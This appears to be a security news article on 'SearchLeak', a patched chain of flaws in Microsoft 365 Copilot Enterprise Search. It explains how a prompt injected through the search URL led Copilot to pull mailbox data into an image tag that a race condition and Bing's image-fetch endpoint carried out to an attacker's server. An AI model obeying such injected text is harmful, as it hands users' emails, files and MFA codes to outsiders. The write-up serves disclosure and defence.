SearchLeak: One-Click Microsoft 365 Copilot Flaw Exposed Emails

Researchers at Varonis Threat Labs have disclosed a critical chain of three vulnerabilities in Microsoft 365 Copilot's Enterprise Search feature that, if exploited, would have allowed an attacker to steal emails, calendar entries, indexed files, and even MFA codes from a victim with a single click on a legitimate microsoft.com link. The researchers dubbed the attack path "SearchLeak" and presented a proof-of-concept at a recent security conference. Microsoft has since assigned CVE-2026-42824 and mitigated the flaw on the backend, confirming that no customer action is required and that no in-the-wild exploitation has been observed. The CVSS scores reflected a split in severity assessment, with Microsoft rating the bug 6.5 and the National Vulnerability Database scoring it higher at 7.5.

The exploit is a textbook example of how AI assistants inherit and amplify classic web vulnerabilities. It begins with a parameter-to-prompt injection in the `q` parameter of the Copilot Enterprise Search URL, where Copilot interprets attacker-controlled text as natural-language instructions rather than a search query. A crafted URL instructs Copilot to search the user's mailbox, extract an email subject, and embed it inside an `` tag pointing to a Bing image-search URL. Because the link lives on a trusted microsoft.com domain, conventional anti-phishing and URL filtering controls are unlikely to block it. Once the victim clicks, Copilot does the rest. Anyone concerned about exposure of corporate mailbox data can verify their accounts using an email breach checker, and review their broader exposure posture with a privacy checkup.

Two legacy web flaws complete the chain. First, a race condition in the response renderer allows the injected `` tag to fire and resolve before Microsoft's sanitization wrapper neutralizes it, since the browser parses the streaming response as it arrives while the guardrail is only applied post-generation. Second, a permissive Content Security Policy on `m365.cloud.microsoft` blocks arbitrary image domains but allowlists `*.bing.com`. Bing's "Search by Image" endpoint fetches the supplied URL server-side to analyze it, which means the exfiltration request originates from Bing's infrastructure and bypasses the browser's CSP entirely. Bing effectively becomes the exfiltration proxy, with the attacker reading the stolen data straight from their own server logs in the form of a request such as `/Your_Security_Code_847291/img.png`. Defenders investigating similar CSP-bypass or proxy-relay abuse patterns can use a VPN/proxy detector to identify unexpected intermediaries in outbound traffic.

Because Copilot Enterprise inherits whatever Microsoft Graph permissions the signed-in user holds, an attacker leveraging SearchLeak effectively inherits those permissions as well, all without ever supplying credentials. The single-click path covers the full read scope: mailbox content, calendar metadata, SharePoint-indexed documents, and one-time codes sent over email. The flaw underscores how the attack surface of enterprise AI tools extends well beyond the model itself into the surrounding web stack, where traditional weaknesses like command injection, race conditions, and overly permissive CSPs can be reassembled into a modern data-exfiltration pipeline. Organizations should treat this as a reminder to audit Copilot and similar assistants for chained-vulnerability risk, monitor Bing image-search traffic from enterprise ranges, and verify that the real-world exposure of their workforce starts with the basics, including checking whether corporate credentials already appear in known leaks.